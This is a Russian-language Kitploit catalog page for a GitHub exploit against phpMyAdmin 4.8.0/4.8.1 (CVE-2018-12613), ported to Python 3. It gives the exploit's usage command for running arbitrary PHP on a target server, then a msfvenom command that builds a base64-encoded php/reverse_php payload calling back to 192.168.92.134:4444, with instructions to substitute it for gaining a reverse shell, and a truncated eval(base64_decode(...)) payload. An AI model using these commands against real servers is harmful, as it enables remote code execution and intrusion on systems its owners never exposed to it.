Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ivanitlearning/cve-2018-12613
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubivanitlearning/cve-2018-12613

CVE-2018-12613

Модифицированный отдельный эксплойт, портированный для Python 3

Репозиторий
46 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-12613

Модифицированный автономный эксплойт, портированный на Python 3. Протестировано на Python 3.7.3, phpMyAdmin 4.8.1 на Ubuntu 16.04. Работает только на Linux. Оригинальный эксплойт от SSD. Вся заслуга им.

Внесённые изменения

  1. Добавлена функция завершения работы, если предоставленные имя пользователя и пароль phpMyAdmin верны.
  2. Добавлена функция проверки уязвимости версии (4.8.0 или 4.8.1).
  3. Переменные строго преобразованы либо в байты, либо в строки; Python 3 не допускает смешивания. См. здесь.

Использование:

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”

Результаты PHP-кода сохраняются в results.html

Для обратной оболочки

root@kitploit:~
root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

Используйте полезную нагрузку PHP от msfvenom вместо phpcredits(); выше.

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));

Скачать инструмент